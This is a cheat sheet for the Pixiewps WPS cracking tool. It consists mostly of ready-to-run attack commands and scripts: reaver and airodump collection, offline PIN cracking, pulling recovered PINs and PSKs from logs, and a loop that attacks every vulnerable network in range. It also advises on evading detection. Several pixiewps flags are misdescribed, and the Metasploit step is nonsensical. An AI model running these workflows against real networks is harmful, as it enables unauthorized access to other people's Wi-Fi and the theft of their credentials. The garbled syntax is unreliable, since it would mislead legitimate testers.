Pixiewps

Overview

Pixiewps is a tool designed to exploit vulnerabilities in Wi-Fi Protected Setup (WPS) implementations, specifically targeting low entropy in PIN generation. It performs offline brute force attacks on WPS PINs captured during wireless assessments, significantly reducing the time required to crack WPS compared to online attacks.

Key Features:

Offline WPS PIN brute forcing
Exploits low entropy in PIN generation
Dramatically faster than online attacks
Integration with aircrack-ng suite
Support for multiple WPS vulnerabilities
Parallel processing for performance
Detailed diagnostic output

Installation

From GitHub

git clone https://github.com/wiire-a/pixiewps.git
cd pixiewps
make

Debian/Ubuntu

sudo apt-get install pixiewps

From Source

git clone https://github.com/wiire-a/pixiewps.git
cd pixiewps
./configure
make
sudo make install

Docker

docker run -it --rm pixiewps

Verify Installation

pixiewps --version
pixiewps --help

Prerequisites

Required Tools

# Install related tools
sudo apt-get install aircrack-ng
sudo apt-get install reaver
sudo apt-get install wash

Compatible Hardware

Any Linux system with network interface
Wireless adapter capable of monitor mode
Airodump-ng compatible device recommended

Basic Usage

Check for WPS Vulnerabilities

# Scan for WPS-enabled networks
wash -i wlan0

# More detailed scan
wash -i wlan0 -C

Simple Pixiewps Attack

# Basic WPS PIN brute force
pixiewps -e ESSID -r PIN -s SERIAL -m MAC -n NONCE -z EC_PUB_KEY

Integration with Reaver

# Reaver collects WPS data, Pixiewps cracks offline
reaver -i wlan0 -b BSSID -c CHANNEL -vvv
# Then use pixiewps with collected data

Core Commands

Command	Description
`-e, --essid`	Network ESSID name
`-r, --reaver-file`	Reaver output file
`-s, --serial`	Device serial number
`-m, --mac`	Device MAC address
`-n, --nonce`	WPS nonce value
`-z, --ec-public-key`	EC public key
`-a, --known-pins`	Known PINs list
`-o, --output`	Save results to file
`-v, --verbose`	Verbose output
`--threads`	Number of processing threads

WPS Data Collection

Aircrack-ng Integration

# Set interface to monitor mode
sudo airmon-ng start wlan0

# Find WPS-enabled networks
wash -i wlan0mon

# Capture WPS handshake
airodump-ng -w capture -c CHANNEL --bssid BSSID wlan0mon

Reaver WPS Reconnaissance

# Basic reaver scan
reaver -i wlan0 -b BSSID

# Verbose output with channel
reaver -i wlan0 -b BSSID -c CHANNEL -vvv

# Save WPS data
reaver -i wlan0 -b BSSID -f -N

Extract WPS Information

# Get detailed WPS information
wash -i wlan0 -C

# Filter for vulnerable networks
wash -i wlan0 | grep "Yes"

Pixiewps Attack Workflow

Complete WPS Crack Workflow

#!/bin/bash
# Full WPS cracking workflow

IFACE="wlan0"
BSSID="AA:BB:CC:DD:EE:FF"
CHANNEL="6"

# 1. Enable monitor mode
sudo airmon-ng start $IFACE

# 2. Scan for WPS-enabled networks
wash -i ${IFACE}mon -C | grep $BSSID

# 3. Run Reaver to collect WPS data
reaver -i ${IFACE}mon -b $BSSID -c $CHANNEL -vvv

# 4. Extract captured data and use Pixiewps
pixiewps -r captured_data.wps

Collect WPS Credentials

# Basic credential collection
reaver -i wlan0 -b BSSID -N -vvv

# With timeout and retry
reaver -i wlan0 -b BSSID -c CHANNEL -t 2 -n 10 -vvv

# Save output for offline cracking
reaver -i wlan0 -b BSSID -N -o wps_data.txt

Offline Cracking Techniques

Load Captured WPS Data

# Use captured WPS handshake
pixiewps -r /path/to/captured_data

# Analyze captured data
pixiewps -r captured.wps --verbose

Dictionary and Known PIN Lists

# Try known WPS PINs
pixiewps --known-pins pins.txt

# Brute force with constraints
pixiewps -e TARGET_SSID --serial "0000" -m AA:BB:CC:DD:EE:FF

Parallel Processing

# Use multiple threads for faster cracking
pixiewps -r captured.wps --threads 8

# Maximum performance
pixiewps -r captured.wps --threads $(nproc)

Advanced WPS Exploitation

Pixiedust Attack

# Pixiedust exploits weak randomness
pixiewps -r data.wps -s SERIAL_NUMBER -n NONCE -z EC_PUBLIC_KEY

# Extract and exploit
reaver -i wlan0 -b BSSID -K 1 -vvv

WPS PIN Brute Force

# Standard 8-digit PIN brute force
pixiewps -e ESSID -s SERIAL -m MAC_ADDRESS

# With known partial PIN
pixiewps -e ESSID -s "12340000" -m AA:BB:CC:DD:EE:FF

# High-performance attack
pixiewps -r captured.wps --threads 12 -v

Vulnerability Detection

# Check for WPS vulnerabilities
reaver -i wlan0 -b BSSID -K 1 -Z

# Analyze WPS implementation
wash -i wlan0 -C | grep -E "Pixiedust|Known PIN"

Data Extraction and Analysis

Extract WPS Credentials from Capture

# Extract PIN from reaver output
grep "WPS PIN:" reaver_output.txt

# Extract PSK
grep "WPA PSK:" reaver_output.txt

# Extract SSID and Security
grep -E "ESSID|Security" reaver_output.txt

Parse Pixiewps Output

# Analyze successful crack
pixiewps -r data.wps | grep -i "pin\|psk"

# Extract generated PIN
pixiewps -r data.wps --verbose 2>&1 | grep "^[0-9]\{8\}$"

Create PIN Dictionary from Leaks

# Compile known WPS PINs
cat /path/to/wps_pin_database.txt > known_pins.dict

# Use for faster cracking
pixiewps --known-pins known_pins.dict -r captured.wps

Practical Attack Scenarios

Rapid Network Assessment

#!/bin/bash
# Quick WPS network assessment

TARGET_BSSID="AA:BB:CC:DD:EE:FF"
TARGET_CHANNEL="6"

# Start monitor mode
airmon-ng start wlan0

# Quick WPS scan
wash -i wlan0mon -C

# Run pixiewps-backed reaver
reaver -i wlan0mon -b $TARGET_BSSID -c $TARGET_CHANNEL -K 1 -vvv

# Alternative: use airodump to capture, then pixiewps offline
airodump-ng -w cap -c $TARGET_CHANNEL --bssid $TARGET_BSSID wlan0mon

Offline Cracking Laboratory

#!/bin/bash
# Offline WPS cracking setup

# Transfer captured WPS files to lab system
scp user@assessment-device:/tmp/*.wps ./wps_captures/

# Batch process with pixiewps
for file in wps_captures/*.wps; do
  echo "Processing $file..."
  pixiewps -r "$file" --threads $(nproc) -o results.txt
done

# Summarize results
cat results.txt | grep -E "PIN|PSK" > final_credentials.txt

Targeted Network Exploitation

# 1. Identify vulnerable networks
wash -i wlan0mon | grep "Yes" | awk '{print $1, $2}' > targets.txt

# 2. For each target, collect WPS data
while IFS= read -r BSSID ESSID; do
  echo "Attacking $ESSID ($BSSID)"
  reaver -i wlan0mon -b "$BSSID" -c CHANNEL -vvv
done < targets.txt

# 3. Offline crack all captures
for wps_file in *.wps; do
  pixiewps -r "$wps_file" >> all_results.txt
done

Performance Optimization

Maximize Processing Speed

# Use all available CPU cores
pixiewps -r data.wps --threads $(nproc) -v

# Reduce memory usage
pixiewps -r data.wps --quiet --threads 4

Parallel Attacks

# Run multiple pixiewps instances
for i in {1..4}; do
  pixiewps -r data_$i.wps --threads $(( $(nproc) / 4 )) &
done
wait

Optimize Collection

# Fast data collection with reaver
reaver -i wlan0mon -b BSSID -d 2 -t 2 -n 10 -N -vvv

# Minimal connection time
reaver -i wlan0mon -b BSSID -c CHANNEL -p -vvv

Integration Workflows

Reaver + Pixiewps Pipeline

#!/bin/bash
BSSID="AA:BB:CC:DD:EE:FF"
IFACE="wlan0mon"
CHANNEL="6"

# Step 1: Collect with Reaver
reaver -i $IFACE -b $BSSID -c $CHANNEL -vvv 2>&1 | tee reaver.log

# Step 2: Extract WPS info from log
SERIAL=$(grep "Serial Number" reaver.log | awk '{print $NF}')
MAC=$(grep "MAC" reaver.log | awk '{print $NF}')

# Step 3: Run pixiewps
pixiewps -e TARGET_SSID -s $SERIAL -m $MAC -n NONCE -z PUBKEY

# Step 4: Attempt PSK connection
wpa_supplicant -B -i wlan0 -c <(wpa_passphrase SSID PASSPHRASE)

Metasploit Integration

# Use pixiewps results in Metasploit
msfconsole
use auxiliary/scanner/http/default_creds
set PASSWORD <PIN_FROM_PIXIEWPS>
run

Troubleshooting

Monitor Mode Issues

# Kill conflicting processes
sudo airmon-ng check kill

# Start monitor mode again
sudo airmon-ng start wlan0

# Verify mode
iwconfig | grep Mode

No WPS Data Captured

# Check target supports WPS
wash -i wlan0mon | grep "Yes"

# Increase collection time
reaver -i wlan0mon -b BSSID -t 60 -vvv

# Try alternative channel
reaver -i wlan0mon -b BSSID -c CHANNEL -vvv

Pixiewps Errors

# Verify correct data format
file *.wps

# Check pixiewps compatibility
pixiewps --version

# Reinstall if corrupted
make clean && make && make install

Device Connection Issues

# Verify wireless adapter
iwconfig

# Check monitor mode persistence
airmon-ng status

# Restart network interface
sudo ip link set wlan0 down
sudo ip link set wlan0 up

Security Considerations

Operational Security

Use VPN for internet traffic during assessments
Disable unnecessary logging
Clean wireless adapter MAC if needed
Use low-power transmission
Avoid timing patterns

Detection Avoidance

Don’t run continuous scans
Randomize assessment timing
Vary attack parameters
Monitor for detection systems
Use wired backup network

Legal and Ethical Considerations

Critical: WPS attacks are only legal on systems you own or have explicit written authorization to test. Unauthorized access to Wi-Fi networks is illegal under computer fraud and unauthorized access laws. WPS testing should only be performed:

On your own networks
With explicit written client authorization
Within agreed-upon testing windows
With proper documentation
By authorized security professionals

Unauthorized wireless network cracking violates laws including the Computer Fraud and Abuse Act (CFAA) and can result in serious legal consequences.

Version and Support

pixiewps --version
git clone https://github.com/wiire-a/pixiewps.git
cd pixiewps && git pull

Common Workflows Summary

Standard WPS Cracking

airmon-ng start wlan0
reaver -i wlan0mon -b BSSID -K 1 -vvv
# Extract data for offline cracking
pixiewps -r captured.wps

Fast Assessment

wash -i wlan0mon -C
# Identify vulnerable networks
reaver -i wlan0mon -b BSSID -c CHANNEL -N -vvv

Batch Processing

for file in *.wps; do
  pixiewps -r "$file" >> results.txt &
done
wait